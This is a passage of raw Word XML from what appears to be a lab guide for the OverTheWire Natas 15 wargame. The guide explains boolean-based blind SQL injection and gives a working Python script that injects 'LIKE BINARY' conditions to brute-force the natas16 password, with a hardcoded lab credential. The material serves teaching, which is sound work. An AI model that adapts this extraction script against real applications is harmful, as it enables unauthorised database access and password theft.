      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tags,  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt;0xa0&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">  as we did in the last task. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C51648" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="47F4C7AF" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the build output tab, press </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CTRL+SHIFT+P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringEncode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deentitze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Click on this option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D6469" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CTRL+H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the find bar and then hit the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">replace all </w:t>
      </w:r>
      <w:r>
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7521CFD5" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CTRL+H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>type  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">0xa0&gt; in the find bar and then hit the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">replace all </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">button. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The end result</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should clean up the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F075B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="0039F3F9" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7A6E7359" wp14:editId="7A4C0AF3">
            <wp:extent cx="5224463" cy="5266325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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5224463" cy="5266325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5136A0" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A9878C" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">This looks like another SQL injection. Only this time, we are getting a Boolean response of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>This user exists</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>This user does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Let’s see if the user natas16 exists. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1CB8C" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="47AA6A7D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">In the natas15-16 tab, change the parameter as shown below in the screenshot. Don't forget to modify the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> line too!</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="85" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9265"/>
      </w:tblGrid>
      <w:tr w:rsidR="008866CC" w14:paraId="51BAC37D" w14:textId="77777777" w:rsidTr="00C73782">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9265" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A74E67A" w14:textId="7BB28321" w:rsidR="008866CC" w:rsidRDefault="00375A47" w:rsidP="008866CC">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A5D927C" wp14:editId="6F2B3322">
                  <wp:extent cx="5943600" cy="322262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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55ACE512" w14:textId="77777777" w:rsidR="008866CC" w:rsidRDefault="008866CC" w:rsidP="008866CC">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC412D3" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="50132B8D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="0A7AA6A7" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="1E5813C3" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="33FAD112" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="524D0297" wp14:editId="6F692D80">
            <wp:extent cx="5943600" cy="1816100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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5943600" cy="1816100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38335FFA" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="25F5DBC1" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="31036EC1" wp14:editId="6BBCA147">
            <wp:extent cx="2114550" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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2114550" cy="1047750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC3E19" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="5EE72DC1" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The PHP code has returned a response indicating the user exists. Now we need to modify the request in a way that will leak data from the user. This is completed easily in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as done in previous tasks. This VM does not have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, but this method can be tried in another VM. Understanding how it can be done in Python, however, will help improve your scripting skills. This is not an advanced Python programming course, so I will provide you with the code and walk you through how it is brute forcing </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>the password. The script will take a moment to start printing as the loop needs to find a character that exists.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D33BCC" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A9F685" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Copy and paste the code below into the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>natas15-16 tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A633E5B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_heading=h.gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Build the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C1495" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638E64B4"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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA3FA7"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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>requests.auth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTPBasicAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C28E9F2" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A3C18E"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chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4539DB"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filtered = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9552A"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passwd = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD4CE20" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47F47F5C"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for char in chars:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C6CF2E"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ab/>
        <w:t>Data = {'username</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'natas16" and password LIKE BINARY "%' + char + '%" #'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06DAA0"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ab/>
        <w:t xml:space="preserve">r = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>requests.post(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'http://natas15.natas.labs.overthewire.org/index.php?debug', auth=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTPBasicAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FDE778"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ab/>
        <w:t xml:space="preserve">if 'exists' in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="67A5BB09"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ab/>
        <w:t xml:space="preserve">    filtered = filtered + char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C053D4E" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500DCEE6"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for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0,32):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7272B"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ab/>
        <w:t>for char in filtered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F367FC0"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ab/>
        <w:t xml:space="preserve">    Data = {'username</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CFCE81"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ab/>
        <w:t xml:space="preserve">    r = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>requests.post(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'http://natas15.natas.labs.overthewire.org/index.php?debug', auth=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTPBasicAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4731F7F7"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ab/>
        <w:t xml:space="preserve">    if 'exists' in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6302950C"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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>passwd = passwd + char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751CD0C9"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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>print(passwd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82B0A5" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>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        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E24BC6" w14:paraId="570A8422" w14:textId="77777777" w:rsidTr="00E24BC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03F487CD" w14:textId="20D0F841" w:rsidR="00E24BC6" w:rsidRDefault="00A61D8F">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BD09707" wp14:editId="110C1FB7">
                  <wp:extent cx="5943600" cy="3225800"/>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inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
